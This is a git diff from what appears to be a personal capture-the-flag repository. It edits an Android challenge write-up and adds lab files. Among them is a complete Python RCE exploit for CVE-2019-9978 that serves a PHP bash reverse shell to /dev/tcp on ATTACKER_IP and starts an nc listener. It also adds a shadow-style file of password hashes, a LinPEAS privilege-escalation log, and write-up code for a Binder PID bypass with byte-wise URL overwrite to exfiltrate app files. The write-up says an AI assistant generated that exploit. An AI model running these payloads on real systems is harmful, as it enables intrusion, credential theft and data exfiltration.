diff --git a/.gitignore b/.gitignore index 6e40c31..a12d44e 100644 --- a/.gitignore +++ b/.gitignore @@ -2,3 +2,5 @@ .venv/ __pycache__/ core.* +/2026/usd_hackertag/ovpn_HT26MU06.conf +/2026/usd_hackertag/freya/linpeas.sh diff --git a/2026/cscg/pwn/canopysaurus/ecu_sim.i64 b/2026/cscg/pwn/canopysaurus/ecu_sim.i64 new file mode 100644 index 0000000..c8a360e Binary files /dev/null and b/2026/cscg/pwn/canopysaurus/ecu_sim.i64 differ diff --git a/2026/insomnihack/mobile/peaky_binders/PeakyBinders-df87519a5cdcf8f1d106cebb41b8ca8879274b7cf2a2237156a517d3e143a969.apk.jadx b/2026/insomnihack/mobile/peaky_binders/PeakyBinders-df87519a5cdcf8f1d106cebb41b8ca8879274b7cf2a2237156a517d3e143a969.apk.jadx deleted file mode 100644 index 5aa8652..0000000 --- a/2026/insomnihack/mobile/peaky_binders/PeakyBinders-df87519a5cdcf8f1d106cebb41b8ca8879274b7cf2a2237156a517d3e143a969.apk.jadx +++ /dev/null @@ -1,149 +0,0 @@ -{ - "projectVersion": 2, - "files": [ - "../PeakyBinders-df87519a5cdcf8f1d106cebb41b8ca8879274b7cf2a2237156a517d3e143a969.apk" - ], - "treeExpansionsV2": [], - "codeData": { - "comments": [], - "renames": [ - { - "nodeRef": { - "refType": "METHOD", - "declClass": "com.peaky.binders.PeakyService$1", - "shortId": "DebugCheckFile([B)V" - }, - "codeRef": { - "attachType": "VAR", - "index": 131080 - }, - "newName": "serverUrl" - }, - { - "nodeRef": { - "refType": "METHOD", - "declClass": "com.peaky.binders.PeakyService$1", - "shortId": "DebugCheckFile([B)V" - }, - "codeRef": { - "attachType": "VAR", - "index": 458757 - }, - "newName": "len_content" - } - ] - }, - "openTabs": [ - { - "type": "class", - "tabPath": "com.peaky.binders.Achievement", - "subPath": "java", - "caret": 83, - "view": { - "x": 0, - "y": 0 - }, - "active": false, - "pinned": false, - "bookmarked": false, - "hidden": false, - "previewTab": false - }, - { - "type": "class", - "tabPath": "com.peaky.binders.AchievementAdapter", - "subPath": "java", - "caret": 369, - "view": { - "x": 0, - "y": 0 - }, - "active": false, - "pinned": false, - "bookmarked": false, - "hidden": false, - "previewTab": false - }, - { - "type": "class", - "tabPath": "com.peaky.binders.MainActivity", - "subPath": "java", - "caret": 5293, - "view": { - "x": 0, - "y": 1512 - }, - "active": true, - "pinned": false, - "bookmarked": false, - "hidden": false, - "previewTab": false - }, - { - "type": "class", - "tabPath": "com.peaky.binders.R", - "subPath": "java", - "caret": 400993, - "view": { - "x": 0, - "y": 191555 - }, - "active": false, - "pinned": false, - "bookmarked": false, - "hidden": false, - "previewTab": false - }, - { - "type": "class", - "tabPath": "com.peaky.binders.PeakyService", - "subPath": "java", - "caret": 449, - "view": { - "x": 0, - "y": 108 - }, - "active": false, - "pinned": false, - "bookmarked": false, - "hidden": false, - "previewTab": false - }, - { - "type": "class", - "tabPath": "com.peaky.binders.IPeakyService", - "subPath": "java", - "caret": 2059, - "view": { - "x": 0, - "y": 627 - }, - "active": false, - "pinned": false, - "bookmarked": false, - "hidden": false, - "previewTab": false - }, - { - "type": "resource", - "tabPath": "AndroidManifest.xml", - "subPath": "", - "caret": 344, - "view": { - "x": 0, - "y": 0 - }, - "active": false, - "pinned": false, - "bookmarked": false, - "hidden": false, - "previewTab": false - } - ], - "cacheDir": "/home/cato/.cache/jadx/projects/PeakyBinders-df87519a5cdcf8f1d106cebb41b8ca8879274b7cf2a2237156a517d3e143a969-d1321210fa1b70152852835e73296d91", - "enableLiveReload": false, - "searchHistory": [], - "searchResourcesFilter": "$TEXT", - "searchResourcesSizeLimit": 0, - "pluginOptions": {} -} \ No newline at end of file diff --git a/2026/insomnihack/mobile/peaky_binders/writeup.md b/2026/insomnihack/mobile/peaky_binders/writeup.md index 0bc4278..63ca849 100644 --- a/2026/insomnihack/mobile/peaky_binders/writeup.md +++ b/2026/insomnihack/mobile/peaky_binders/writeup.md @@ -33,7 +33,6 @@ The app seems to be used as an Achievement Tracker: The first two achievements are trivial. For the first you have to enter a name containing `shelby`. The second requires to press a button twenty times. The PeakyService is an exported Android Service that exposes a custom Binder interface. Through this interface, it allows external processes interact with three specific methods: `DebugCheckFile`, `isAchievmentUnlocked` and `enableDebugMode`. -This is our entry point for the exploit. The function `DebugCheckFile` unlocks the third achievement. This has to be the secret command. @@ -47,35 +46,9 @@ public void DebugCheckFile(byte[] bArr) throws RemoteException { } Log.d("PeakyService", "Called from a root process: " + callingPid); PeakyService.this.logToFile("DebugCheckFile called from root process - PID: " + callingPid); - String str = new String(bArr); - PeakyService.this.logToFile("Caller name: ".concat(str)); - String[] strArrRetrieveLog = PeakyService.this.RetrieveLog(str); - if (strArrRetrieveLog != null && strArrRetrieveLog.length == 2) { - final String serverUrl = strArrRetrieveLog[0]; - final String log_content = strArrRetrieveLog[1]; - Log.d("PeakyService", "DEBUG serverUrl: " + serverUrl); - Log.d("PeakyService", "DEBUG logContent length: " + log_content.length()); - PeakyService.this.logToFile("DEBUG serverUrl: " + serverUrl); - new Thread(new Runnable() { // from class: com.peaky.binders.PeakyService.1.1 - @Override // java.lang.Runnable - public void run() { - try { - HttpURLConnection httpURLConnection = (HttpURLConnection) new URL(serverUrl + "/logs/").openConnection(); - httpURLConnection.setRequestMethod("POST"); - httpURLConnection.setDoOutput(true); - httpURLConnection.setRequestProperty("Content-Type", "text/plain"); - OutputStream outputStream = httpURLConnection.getOutputStream(); - outputStream.write(log_content.getBytes()); - outputStream.flush(); - outputStream.close(); - Log.d("PeakyService", "HTTP Response: " + httpURLConnection.getResponseCode()); - httpURLConnection.disconnect(); - } catch (Exception e) { - Log.e("PeakyService", "Failed to send logs: " + e.getMessage()); - } - } - }).start(); - } + + //[28 lines of Code removed for clarity] + Intent intent = new Intent(PeakyService.ACTION_ACHIEVEMENT_UNLOCKED); intent.putExtra(PeakyService.EXTRA_ACHIEVEMENT_INDEX, 2); PeakyService.this.sendBroadcast(intent); @@ -84,21 +57,14 @@ public void DebugCheckFile(byte[] bArr) throws RemoteException { ### Bypass the root requirement -The first problem to tackle is to circumvent the root check. +To unlock the third achievement we have to call the method from a process with `PID = 0`. +Usually having a PID of `0` is not possible for normal user space processes. +Thankfully the Android API helps us out. -```java -int callingPid = Binder.getCallingPid(); -if (callingPid != 0) { - Log.d("PeakyService", "We allow a root process only: " + callingPid); - PeakyService.this.logToFile("DebugCheckFile called - rejected, PID: " + callingPid); - return; -} -``` - -The Android API reference for Binder.getCallingPid states the following https://developer.android.com/reference/android/os/Binder#getCallingPid() +The [Android API reference](https://developer.android.com/reference/android/os/Binder#getCallingPid()) for `Binder.getCallingPid` states the following: > Warning do not use this as a security identifier! PID is unreliable as it may be re-used. This should mostly be used for debugging. oneway transactions do not receive PID. Even if you expect a transaction to be synchronous, a misbehaving client could send it as a asynchronous call and result in a 0 PID here. -To abuse this bug you can use a function like this (by the courtesy of Claude): +The wrongful usage of `Binder.getCallingPid` as an authorization mechanism makes the PID check trivial to pass. ```java private void sendOnewayTransaction(byte[] payload) throws RemoteException { Parcel data = Parcel.obtain(); @@ -110,13 +76,50 @@ private void sendOnewayTransaction(byte[] payload) throws RemoteException { data.recycle(); } ``` -This proves there is a way to call DebugCheckFile and get our third achievement but there is still no flag in sight. -### Leak file content +Wuhu we got the third achievement! +I hoped that the flag is then somehow shown on the screen but this was not the case. + +### Further analysis + +I left out 28 lines of code from `DebugCheckFile` earlier: +```java +String str = new String(bArr); +PeakyService.this.logToFile("Caller name: ".concat(str)); +String[] strArrRetrieveLog = PeakyService.this.RetrieveLog(str); +if (strArrRetrieveLog != null && strArrRetrieveLog.length == 2) { + final String serverUrl = strArrRetrieveLog[0]; + final String log_content = strArrRetrieveLog[1]; + Log.d("PeakyService", "DEBUG serverUrl: " + serverUrl); + Log.d("PeakyService", "DEBUG logContent length: " + log_content.length()); + PeakyService.this.logToFile("DEBUG serverUrl: " + serverUrl); + new Thread(new Runnable() { // from class: com.peaky.binders.PeakyService.1.1 + @Override // java.lang.Runnable + public void run() { + try { + HttpURLConnection httpURLConnection = (HttpURLConnection) new URL(serverUrl + "/logs/").openConnection(); + httpURLConnection.setRequestMethod("POST"); + httpURLConnection.setDoOutput(true); + httpURLConnection.setRequestProperty("Content-Type", "text/plain"); + OutputStream outputStream = httpURLConnection.getOutputStream(); + outputStream.write(log_content.getBytes()); + outputStream.flush(); + outputStream.close(); + Log.d("PeakyService", "HTTP Response: " + httpURLConnection.getResponseCode()); + httpURLConnection.disconnect(); + } catch (Exception e) { + Log.e("PeakyService", "Failed to send logs: " + e.getMessage()); + } + } + }).start(); +} +``` +`DebugCheckFile` sends logs to some server. The log content and the server URL come from `RetrieveLog`. This seems to be some functionality for debugging or telemetry purposes. -Looking a bit further into the function the content and server url is fetched by `String[] strArrRetrieveLog = PeakyService.this.RetrieveLog(str)`. +### Weaponizing telemetry +RetrieveLog is not in the Java code. It is defined in a separate compiled Binary named `libpeaky.so`. ```java static { System.loadLibrary("peaky"); @@ -126,18 +129,16 @@ static { public native String[] RetrieveLog(String str); ``` -This just turned into a x86_64 reversing challenge! +Using IDA I found out that the Java string that is passed to the function is consumed by `sscanf(callerNameCStr, "%15[^:]:%d:%c", callerTag, &partialOffset, &separatorChar)`. -The function accepts a Java string that acts as a command, reads the last 2048 bytes of a log file to a buffer, and returns a two-element Java String[] array containing a server URL and the log contents. +By examining the callerTag comparisons in the decompiled source, I identified two valid commands: `FULL` and `PARTIAL`. -The command is parsed with `sscanf(callerNameCStr, "%15[^:]:%d:%c", callerTag, &partialOffset, &separatorChar)`. -Because of this a command has the format `"::"`. -There are two commands: `FULL` and `PARTIAL` - -As per my understanding both commands only differ slightly. The `PARTIAL` command writes `separatorChar` at `partialOffset` in the buffer. +Both commands are nearly identical: each opens a file, reads its final 2048 bytes into a buffer, and returns that buffer along with a URL. The URL serves as the target to which the buffer's contents are sent as we have already seen. +The only difference is that the `PARTIAL` command additionally writes `separatorChar` into the buffer at `partialOffset` before returning. This is the logic for writing the separator into the buffer: -``` + +```c if ( *(_QWORD *)callerTag == 'LAITRAP' ) // If PARTIAL set separator { clampedOffset = partialOffset; @@ -156,37 +157,34 @@ if ( *(_QWORD *)callerTag == 'LAITRAP' ) // If PARTIAL set separator g_fileBuffer[separatorPos] = separatorChar; } ``` -The security problem here is that `clampedOffset` and `partialOffset` are both signed integers. -When `clampedOffset` is negative, like `-1`, the subtraction wraps: +The vulnerability lies in the fact that both `clampedOffset` and `partialOffset` are signed integers. The upper bound check `partialOffset >= 2049` correctly rejects values that are too large, but there is no lower bound check. Negative values pass through unconstrained. When `calmpedOffset` is negative the subtraction wraps upwards. ``` 2048 - (-1) = 2049 ``` -`g_fileBuffer[2049]` is the first byte **past** the buffer, which lands exactly on `g_serverUrl[0]`. +`g_fileBuffer[2049]` is one byte **past** the end of the buffer, which lands exactly on `g_serverUrl[0]`. More generally, to write to `g_serverUrl[i]` we need `separatorPos = 2049 + i` -Generalizing: to write to `g_serverUrl[i]` you need `separatorPos = 2049 + i` which means: ``` 2048 - clampedOffset = 2049 + i clampedOffset = -(1 + i) ``` -This allows an attacker to change the URL byte for byte. -Same thing can be done with the logFilePath (here with an offset of `65` and not `1`). +This gives an attacker byte-by-byte control over `g_serverUrl`. The same technique applies to `g_logFilePath`, which sits 65 bytes past the end of the buffer. - -Memory layout in .data: +The relevant memory layout in .data is: ``` g_fileBuffer @ 0x39D8 (2049 bytes, ends at 0x41D8) g_serverUrl @ 0x41D9 (64 bytes) g_logFilePath @ 0x4219 (64 bytes) ``` +By overwriting `g_serverUrl` to an attacker-controlled server and `g_logFilePath` to any file on the device an attacker can read any arbitrary file and exfiltrate data to any URL. -Using this we now have an arbitrary file read. ### Flag location We still need to find the Flag. At this point I remembered that the achievements are loaded on start from a file. +This indicates that the app as some form of context or environment variables. ```java private SharedPreferences prefs; @@ -213,20 +211,21 @@ private void loadProgress() { this.adapter.notifyDataSetChanged(); } ``` + I asked Claude where these SharedPreferences are stored. -It not only told me that the standard path is `/data/data//shared_prefs/.xml` it also said this is a common flag hiding spot for CTFs. +It told me that the standard path is `/data/data//shared_prefs/.xml`. ### Writing the Exploit +This challenge is special to me because we are not given a url with a port by the organizers to attack but a portal where we can upload APKs. As I never wrote an APK before and had no Idea how to handle IPC on Android I generated the following exploit with Claude. It feels a bit filthy but trying to first blood the challenge made me rush. In summary the malicious APK overwrites the webhook URL and the filepath byte per byte and triggers a full read at the end. -To circumvent the `PID == 0` check the sendOnewayTransaction function from above is used. +To circumvent the `PID == 0` check the `sendOnewayTransaction` function from above is used. ```java - package com.hacker.exploit; import android.app.Activity; @@ -243,7 +242,7 @@ import android.util.Log; public class MainActivity extends Activity { private static final String TAG = "Exploit"; private IBinder peakyBinder; - private static final String WEBHOOK_URL = "; + private static final String WEBHOOK_URL = ""; private static final String TARGET = "/data/data/com.peaky.binders/shared_prefs/PeakyPrefs.xml"; private ServiceConnection connection = new ServiceConnection() { @@ -303,3 +302,8 @@ public class MainActivity extends Activity { } ``` + +### Conclusion + +I am happy that the flag was indeed stored at `/data/data/com.peaky.binders/shared_prefs/PeakyPrefs.xml`. At the time I had no further ideas where the flag could be hidden. +This challenge was a lot of fun and showed once again how important it is to use APIs only for their intended purpose especially when they are used to implement a security measure. diff --git a/2026/kalmar/misc/git-hoarder/exploit.sh b/2026/kalmar/misc/git-hoarder/exploit.sh old mode 100644 new mode 100755 index d591cce..14873b8 --- a/2026/kalmar/misc/git-hoarder/exploit.sh +++ b/2026/kalmar/misc/git-hoarder/exploit.sh @@ -27,5 +27,8 @@ git commit -m "Delivery package with refs tracked" # 6. Push to your server git branch -M main -git remote add origin https://gitea.cato447.de/cato447/pwn.git +git remote add origin ssh://git@gitea.cato447.de:222/cato447/pwn.git git push -u origin main -f +cd .. + +rm -rf base_repo malicious.git wrapper diff --git a/2026/usd_hackertag/freya/crack_input b/2026/usd_hackertag/freya/crack_input new file mode 100644 index 0000000..6410024 --- /dev/null +++ b/2026/usd_hackertag/freya/crack_input @@ -0,0 +1,31 @@ +root:$6$mbIzpNIo$XElePqDmVNcUEhdU0nH1eQYvRvU1xQqQOM3F38Zceslqiz0tYTc1iAMxFXTt9TKlXsslPvLoLuMlE/n83iNce/:0:0:root:/root:/bin/bash +daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:*:2:2:bin:/bin:/usr/sbin/nologin +sys:*:3:3:sys:/dev:/usr/sbin/nologin +sync:*:4:65534:sync:/bin:/bin/sync +games:*:5:60:games:/usr/games:/usr/sbin/nologin +man:*:6:12:man:/var/cache/man:/usr/sbin/nologin +lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:*:8:8:mail:/var/mail:/usr/sbin/nologin +news:*:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +proxy:*:13:13:proxy:/bin:/usr/sbin/nologin +www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin +backup:*:34:34:backup:/var/backups:/usr/sbin/nologin +list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false +systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false +systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false +systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false +_apt:*:104:65534::/nonexistent:/bin/false +messagebus:*:105:109::/var/run/dbus:/bin/false +sshd:*:106:65534::/run/sshd:/usr/sbin/nologin +user:$6$RGsJnnEH$mma2lPBOwYMp.3JZ/8dhUW4LZ6Mxee2d52wUiQyxMNOXjzUY5PG.SvfmkriTdHgn5WX7OsBo2AOiPCEEMtTN1.:1000:1000:user,,,:/home/user:/bin/bash +mysql:!:107:111:MySQL Server,,,:/nonexistent:/bin/false +ftp:*:108:112:ftp daemon,,,:/srv/ftp:/bin/false +smmta:*:109:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false +smmsp:*:110:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false +baldur:$6$/ScR4vLK$8XCAkPccvTAycL8fOxZagyk.vy54EqmdTcZQWQI.gzcygN6C5Iy35bMI65TZliwP6acrGpnhRBZKFrexoNGtu/:1001:1001::/home/baldur: diff --git a/2026/usd_hackertag/freya/exploit.py b/2026/usd_hackertag/freya/exploit.py new file mode 100644 index 0000000..a4f0670 --- /dev/null +++ b/2026/usd_hackertag/freya/exploit.py @@ -0,0 +1,105 @@ +#!/usr/bin/env python3 + +# Exploit Title: Social Warfare WordPress Plugin 3.5.2 - Remote Code Execution (RCE) +# Date: 25-06-2025 +# Exploit Author: Huseyin Mardini (@housma) +# Original Researcher: Luka Sikic +# Original Exploit Author: hash3liZer +# Vendor Homepage: https://wordpress.org/plugins/social-warfare/ +# Software Link: https://downloads.wordpress.org/plugin/social-warfare.3.5.2.zip +# Version: <= 3.5.2 +# CVE: CVE-2019-9978 +# Tested On: WordPress 5.1.1 with Social Warfare 3.5.2 (on Ubuntu 20.04) +# Python Version: Python 3.x +# Reference: https://www.exploit-db.com/exploits/46794 +# Github (original PoC): https://github.com/hash3liZer/CVE-2019-9978 + +# The currently listed exploit for *CVE-2019-9978* (Exploit ID 46794) appears to no longer work as intended in many modern environments + +# Usage: +# 1. Edit the config section below and replace `ATTACKER_IP` with your machine's IP. +# 2. Run the script: `python3 exploit.py` +# 3. It will: +# - Create a PHP payload and save it as `payload.txt` (or any filename you set in PAYLOAD_FILE) +# - Start an HTTP server on `HTTP_PORT` to host the payload +# - Start a Netcat listener on `LISTEN_PORT` +# - Trigger the vulnerability via the vulnerable `swp_debug` parameter +# 4. On success, you get a reverse shell as `www-data`. +# +# Note: +# - PAYLOAD_FILE defines only the name of the file to be created and served. +# - Make sure ports 8001 and 4444 are open and not in use. + +import requests +import threading +import http.server +import socketserver +import os +import subprocess +import time +import random + +# --- Config --- +TARGET_URL = "http://10.2.66.5/yggdrasil" +ATTACKER_IP = "10.1.0.172" # Change to your attack box IP +HTTP_PORT = 80 +LISTEN_PORT = random.randint(40000,65555) +PAYLOAD_FILE = "payload.txt" + + +def create_payload(): + """Write exact reverse shell payload using valid PHP syntax""" + payload = f'
system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")
' + with open(PAYLOAD_FILE, "w") as f: + f.write(payload) + print(f"[+] Payload written to {PAYLOAD_FILE}") + + +def start_http_server(): + """Serve payload over HTTP""" + handler = http.server.SimpleHTTPRequestHandler + with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd: + print(f"[+] HTTP server running at port {HTTP_PORT}") + httpd.serve_forever() + + +def start_listener(): + """Start Netcat listener""" + print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...") + subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)]) + + +def send_exploit(): + """Trigger the exploit with vulnerable parameter""" + payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}" + exploit = f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}" + print(f"[+] Sending exploit: {exploit}") + try: + requests.get(exploit, timeout=5) + except requests.exceptions.RequestException: + pass + + +def main(): + create_payload() + + # Start web server in background + http_thread = threading.Thread(target=start_http_server, daemon=True) + http_thread.start() + time.sleep(2) # Give server time to start + + # Start listener in background + listener_thread = threading.Thread(target=start_listener) + listener_thread.start() + time.sleep(1) + + # Send the malicious request + send_exploit() + + +if __name__ == "__main__": + try: + main() + except KeyboardInterrupt: + print("[-] Interrupted by user.") + diff --git a/2026/usd_hackertag/freya/out.txt b/2026/usd_hackertag/freya/out.txt new file mode 100644 index 0000000..5383daa --- /dev/null +++ b/2026/usd_hackertag/freya/out.txt @@ -0,0 +1,2083 @@ + + + + ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ + ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄ + ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄ + ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ + ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ + ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ + ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄ + ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄  + ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄ + ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄ + ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄ + ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ + ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄ + ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄ + ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄ + ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄ + ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄  +  ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  + ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ + ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ + ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ + ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀ + ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀ + ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀ + + /---------------------------------------------------------------------------------\ + | Do you like PEASS? | + |---------------------------------------------------------------------------------| + | Linux PE & Hardening : https://hacktricks-training.com/courses/lhe/ | + | Learn Cloud Hacking : https://training.hacktricks.xyz  | + | Follow on Twitter : @hacktricks_live | + | Respect on HTB : SirBroccoli  | + |---------------------------------------------------------------------------------| + | Thank you!  | + \---------------------------------------------------------------------------------/ + LinPEAS-ng by carlospolop + +ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission. + +Linux Privesc Checklist: https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html +Best Linux PE & Hardening course: https://hacktricks-training.com/courses/lhe/ + LEGEND: + RED/YELLOW: 95% a PE vector + RED: You should take a look into it + LightCyan: Users with console + Blue: Users without console & mounted devs + Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) + LightMagenta: Your username + + Starting LinPEAS. Caching Writable Folders... + ╔═══════════════════╗ +═══════════════════════════════╣ Basic information ╠═══════════════════════════════ + ╚═══════════════════╝ +OS: Linux version 4.9.0-13-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.228-1 (2020-07-05) +User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data) +Hostname: Freya + +[+] /bin/ping is available for network discovery (LinPEAS can discover hosts, learn more with -h) +[+] /bin/bash is available for network discovery, port scanning and port forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h) +[+] /bin/nc is available for network discovery & port scanning (LinPEAS can discover hosts and scan ports, learn more with -h) + + +Caching directories DONE + + ╔════════════════════╗ +══════════════════════════════╣ System Information ╠══════════════════════════════ + ╚════════════════════╝ +╔══════════╣ Operative system (T1082) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits +Linux version 4.9.0-13-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.228-1 (2020-07-05) +Distributor ID: Debian +Description: Debian GNU/Linux 9.13 (stretch) +Release: 9.13 +Codename: stretch + +╔══════════╣ Sudo version (T1548.003,T1068) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version +Sudo version 1.8.19p1 + + +╔══════════╣ PATH (T1574.007) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses +/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin + +╔══════════╣ Date & uptime (T1082) +Fri May 8 15:31:42 CEST 2026 + 15:31:42 up 2:02, 0 users, load average: 0.31, 0.07, 0.02 + +╔══════════╣ Unmounted file-system? (T1082,T1120) +╚ Check if you can mount umounted devices +UUID=f7a6612b-4beb-4d99-8e1c-e21ce24de256 / ext4 errors=remount-ro 0 1 +UUID=7ba27db0-d440-4124-afa4-b92fb256e21d none swap sw 0 0 +/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0 + +╔══════════╣ Any sd*/disk* disk in /dev? (limit 20) (T1082) +disk +sda +sda1 +sda2 +sda5 + +╔══════════╣ Environment (T1082,T1552.007) +╚ Any private information inside environment variables? +APACHE_LOG_DIR=/var/log/apache2 +LANG=C +OLDPWD=/home +APACHE_LOCK_DIR=/var/lock/apache2 +PWD=/tmp +APACHE_RUN_GROUP=www-data +APACHE_RUN_DIR=/var/run/apache2 +APACHE_RUN_USER=www-data +APACHE_PID_FILE=/var/run/apache2/apache2.pid +SHLVL=3 +LANGUAGE=en_US:en +_=/usr/bin/env + +╔══════════╣ Searching Signature verification failed in dmesg (T1082) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed +dmesg Not Found + +╔══════════╣ Protections (T1518.001) +═╣ AppArmor enabled? .............. /etc/apparmor.d +═╣ AppArmor profile? .............. unconfined +═╣ is linuxONE? ................... s390x Not Found +═╣ grsecurity present? ............ grsecurity Not Found +═╣ PaX bins present? .............. PaX Not Found +═╣ Execshield enabled? ............ Execshield Not Found +═╣ SELinux enabled? ............... sestatus Not Found +═╣ Seccomp enabled? ............... disabled +═╣ User namespace? ................ enabled +═╣ unpriv_userns_clone? ........... 0 +═╣ unpriv_bpf_disabled? ........... 0 +═╣ Cgroup2 enabled? ............... enabled +═╣ kptr_restrict? ................. 0 +═╣ dmesg_restrict? ................ 1 +═╣ ptrace_scope? .................. 0 +═╣ protected_symlinks? ............ /proc/sys/fs/protected_symlinks Not Found +═╣ protected_hardlinks? ........... /proc/sys/fs/protected_hardlinks Not Found +═╣ perf_event_paranoid? ........... 3 +═╣ mmap_min_addr? ................. 65536 +═╣ lockdown mode? ................. /sys/kernel/security/lockdown Not Found +═╣ Kernel hardening flags? ........ CONFIG_SLAB_FREELIST_RANDOM=y +CONFIG_RANDOMIZE_BASE=y +# CONFIG_KASAN is not set +═╣ Is ASLR enabled? ............... Yes +═╣ Printer? ....................... No +═╣ Is this a virtual machine? ..... Yes (qemu) + +╔══════════╣ Kernel Modules Information (T1547.006) +══╣ Kernel modules with weak perms? (T1547.006) + +══╣ Kernel modules loadable? (T1547.006) +Modules can be loaded +══╣ Module signature enforcement? (T1547.006) +Not enforced + +╔══════════╣ Checking for Copy Fail (CVE-2026-31431) (T1068) +╚ https://copy.fail/ +╚ https://www.cve.org/CVERecord?id=CVE-2026-31431 +NOT VULNERABLE: AF_ALG/authencesn is not reachable from this context (getsockaddrarg: bad family) + +╔══════════╣ Kernel Exploit Registry (T1068) +═╣ Operating system ............. Linux +═╣ Kernel release ............... 4.9.0-13-amd64 +═╣ Comparable version ........... 4.9.0.13 +═╣ Data chunk limit ............. max 25 rows per KERNEL_CVE_DATA_* variable (1..21) +═╣ Kernel config source ......... /boot/config-4.9.0-13-amd64 +CVE: CVE-2017-16995 | Name: eBPF_verifier | Match data: pkg=linux-kernel,ver>=4.4,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1 | Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic} | Rank: 5 | Details: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1 +CVE: CVE-2017-1000253 | Name: PIE_stack_corruption | Match data: 